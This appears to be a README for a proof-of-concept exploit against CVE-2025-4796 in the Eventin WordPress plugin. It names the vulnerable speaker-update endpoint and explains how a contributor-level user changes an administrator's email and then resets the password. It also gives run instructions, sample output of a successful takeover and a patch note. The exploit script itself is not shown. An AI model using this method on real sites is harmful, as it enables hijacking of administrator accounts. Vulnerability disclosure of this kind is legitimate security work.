# CVE-2025-4796
eventin &lt;= 4.0.34 - privilege escalation via user email change / account takeover for authenticated contributor+

## description
privilege escalation bug in eventin wordpress plugin (<= 4.0.34) that lets any contributor or higher user change any users email through the plugins speaker update api. by changing an admin email to one the attacker controls, they can reset the password and take over the account.

- vulnerable part: eventin wordpress plugin (`eventin\speaker\api\speakercontroller::update_item`)
- affected versions: <= 4.0.34
- cve: CVE-2025-4796
- cvss: 8.8 (high)


## vulnerability details
eventin doesnt properly check who is requesting the update or if they re allowed to change the user email. a contributor or higher can call this endpoint:
- put /wp-json/eventin/v2/speakers/<speaker_id>
and update the speaker email to an email they control. then the attacker can use wordpress password reset to take over the admin account.



requirements:
- python 3.8 or higher
- requests

install requests:
``
pip install requests
``

## usage
run the script and enter required values when prompted:

``
python3 CVE-2025-4796.py 
``
## example output
[+] turning off ssl verification warnings   
[+] login into wordpress.  
[+] login successful.  
[+] fetching nonce token  
[+] nonce token found: abcdef1234567890   
[+] update request for speaker email    

[+] update operation successful.  

```
url: http://example.com  
id: 123   
email: attacker@example.com. 
user: attacker  
pass: yourpassword  

{. 
  "id": 123,    
  "email": "newemail@example.com",  
  "name": "Speaker Name",    
  ...  
}. 
 ```
## mitigation
patch has been released in version 4.0.35 of the eventin plugin. Site administrators are strongly advised to update to this version immediately. The fix includes additional user validation checks in the SpeakerController::update_item function 
